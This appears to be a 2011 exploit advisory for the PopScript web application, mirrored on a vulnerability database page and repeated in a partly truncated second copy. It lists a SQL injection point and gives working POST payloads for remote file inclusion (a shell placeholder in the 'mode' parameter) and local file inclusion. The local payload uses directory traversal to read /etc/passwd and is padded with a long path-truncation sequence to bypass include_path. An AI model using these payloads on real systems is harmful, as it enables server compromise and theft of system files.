Lucene search

SecurityvulnsSECURITYVULNS:DOC:26472

HistoryJun 08, 2011 - 12:00 a.m.

PopScript Multiple Vulnerabilities

2011-06-0800:00:00

vulners.com

JSON

##########################################################

Exploit Title: PopScript Multiple Vulnerabilities

home : http://www.D99Y.com

Google Dork: Do as you would be done by ; )

Date: 5/6/2011

Author: NassRawI

Software Link: http://www.popscript.com/

##########################################################

[1] SQL injection

http://localhost/PopScript/index.php?act=inbox&mode=1 [ SQL injection ]

[2] File inclusion = require()

Remote File inclusion :

exploit :

send in index.php [ post ]

[email protected]&mode=[Shell txt]?&password=nassrawi&remember=ON

Local :

exploit :

send in index.php [ post ]

[email protected]&mode=nassrawi…/…/…/…/…/…/etc/passwd&password=nassrawi

You can skip protection include_path ; )

[email protected]&mode=nassrawi…/…/…/…/…/…/etc/passwd/./././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././

././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././.
/./././././././././././././././././././././././././././././.!
/./././.
/././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././.

/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././
././././././././././././././././././././././././././././././!
././././
/././././.&password=nassrawi

##########################################################

Greetz :

D99Y Team and all members D99Y.CoM

Enjoy ; )

JSON

PopScript Multiple Vulnerabilities

Exploit Title: PopScript Multiple Vulnerabilities

home : http://www.D99Y.com

Google Dork: Do as you would be done by ; )

Date: 5/6/2011

Author: NassRawI

Software Link: http://www.popscript.com/

[1] SQL injection

http://localhost/PopScript/index.php?act=inbox&amp;mode=1 [ SQL injection ]

[2] File inclusion = require()

Remote File inclusion :

exploit :

send in index.php [ post ]

[email protected]&mode=[Shell txt]?&password=nassrawi&remember=ON

Local :

exploit :

send in index.php [ post ]

[email protected]&mode=nassrawi…/…/…/…/…/…/etc/passwd&password=nassrawi

You can skip protection include_path ; )

http://localhost/PopScript/index.php?act=inbox&mode=1 [ SQL injection ]